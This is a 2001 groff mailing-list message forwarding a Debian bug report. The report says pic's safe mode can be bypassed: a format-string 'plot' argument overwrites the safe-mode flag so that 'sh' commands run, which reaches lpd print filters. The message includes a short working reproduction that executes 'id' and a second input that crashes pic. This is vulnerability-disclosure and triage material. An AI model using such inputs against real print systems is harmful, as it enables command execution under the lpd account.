[Groff] Re: Bug#107459: pic can be forced to run commands in safe mode

[Colin Watson]

On Thu, Aug 02, 2001 at 11:36:37AM +0200, Arnaud Giersch wrote:
> Package: groff
> Version: 1.15.2-1
> 
> pic can be forced to execute commands (sh X..X) when running in safe
> mode (-S). It can be exploited trough lpd when groff/pic is run in
> print filters, and arbitrary commands with id of lpd can be run.
> 
> pic command 'plot -1.99854281554743185012 "%n"' will overwrite memory
> where safe mode variable is stored and then it alows to use "sh"
> command.
> 
> How to reproduce:
> 
> pic -S > /dev/null << EOT
> .PS
> plot -1.99854281554743185012 "%n"
> sh Xid >&2X
> .PE
> EOT
> 
> Actual Results: uid=1000(giersch) gid=300(parallel) ...
> 
> Expected Results: pic:<standard input>:3: unsafe to run command `id >&2'
> 
> Bug has been discovered by Zenith Parsec <address@hidden>.  Exploit
> with patch has been posted to bugtraq:
>         http://www.securityfocus.com/bid/3103
> 
> I've made an patched version for the Potato (groff_1.15.2-1.ag)
> available at:
>         http://arnaud.giersch.free.fr/debian/
> 
> As far as I can see in the sources, the other versions (Woody and Sid)
> are vulnerable too.

Hi,

Are you aware of this problem? I haven't seen any traffic about it here.
Although I haven't yet managed to overwrite the correct bit of memory to
make the exploit work, I've got pic 1.17.2 to segfault by varying plot's
first argument, which is a good indication that something's wrong. The
relevant code in 1.15.2 and 1.17.2 seems largely identical.

At the very least, this should reliably segfault:

  $ pic -S >/dev/null
  .PS
  plot 0 "%n"

Thanks,

-- 
Colin Watson                                  address@hidden